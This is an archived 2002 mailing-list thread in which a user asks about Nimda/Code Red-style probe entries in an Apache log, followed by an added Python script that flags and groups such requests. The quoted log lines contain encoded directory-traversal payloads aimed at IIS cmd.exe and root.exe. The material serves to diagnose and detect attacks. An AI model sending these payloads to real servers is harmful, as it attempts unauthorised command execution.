"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276

Tyler Hall plug-discuss@lists.plug.mybutt.net
Mon, 21 Jan 2002 12:06:07 -0700 (MST)


Where have you been? You should have been getting those the last 6 months!
It's part of the Nimda/Code Red/etc... virus; if you're running
apache/linux, there's no need to worry.

Tyler


On Mon, 21 Jan 2002, Guy Chouinard Jr wrote:

> I just noticed this on my Apache server log.
>
> Is this anything I should be concerned about?
>
> If I understand correctly what I've read, this is
> a worm that exploits MS IIS vulnerabilities.
>
>
> 209.74.14.140 - - [21/Jan/2002:09:38:58 -0700] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 276
>
> 209.74.14.140 - - [21/Jan/2002:09:38:58 -0700] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
>
> 209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
>
> 209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
>
> 209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
>
> 209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
>
> 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
>
> 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 331
>
> 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
>
> 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
>
> 209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
>
> 209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
>
> 209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
>
> 209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
>
> 209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
>
> 209.74.14.140 - - [21/Jan/2002:09:39:02 -0700] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
>
>
>
>
> --
> Guy Chouinard Jr
> http://linuxbytes.net.dhis.org/index.php3
>
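
Added example, not part of the original thread: a small Python triage script that flags the request patterns quoted above (root.exe/cmd.exe targets, double percent-encoding such as `%255c`, and overlong UTF-8 bytes such as `%c0%af`) and groups them by client address. The function names and tag labels are assumptions made for this illustration; the last sample line is constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# First four lines are from the thread (wrapped lines rejoined); the last is constructed.
SAMPLE = """\
209.74.14.140 - - [21/Jan/2002:09:38:58 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
209.74.14.140 - - [21/Jan/2002:09:38:59 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
209.74.14.140 - - [21/Jan/2002:09:39:00 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
209.74.14.140 - - [21/Jan/2002:09:39:01 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
192.0.2.10 - - [21/Jan/2002:09:40:00 -0700] "GET /index.php3 HTTP/1.0" 200 5120
"""

LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
ESCAPE = re.compile(rb"%[0-9a-fA-F]{2}")

def classify(target):
    """Return the set of probe traits found in one request target."""
    tags = set()
    decoded = unquote_to_bytes(target)      # one pass of percent-decoding
    if ESCAPE.search(decoded):              # an escape survived: %255c, %%35c
        tags.add("double-encoded")
    while ESCAPE.search(decoded):           # peel any remaining layers
        decoded = unquote_to_bytes(decoded)
    if b"\xc0" in decoded or b"\xc1" in decoded:  # 0xC0/0xC1 never occur in valid UTF-8
        tags.add("overlong-utf8")
    hit = re.search(rb"(root|cmd)\.exe", decoded.lower())
    if hit:
        tags.add(hit.group(0).decode())
    return tags

def summarize(text):
    """Group flagged requests by client address."""
    report = defaultdict(lambda: {"hits": 0, "tags": set(), "served": False})
    for line in text.splitlines():
        m = LOG.match(line)
        tags = classify(m.group(2)) if m else set()
        if tags:
            entry = report[m.group(1)]
            entry["hits"] += 1
            entry["tags"] |= tags
            entry["served"] |= m.group(3).startswith("2")  # a 2xx reply needs a closer look
    return dict(report)

if __name__ == "__main__":
    for ip, e in summarize(SAMPLE).items():
        print(ip, e["hits"], sorted(e["tags"]), "served" if e["served"] else "rejected")
```

On the sample, every flagged request was answered with 404 or 400, so the `served` flag stays false for that client.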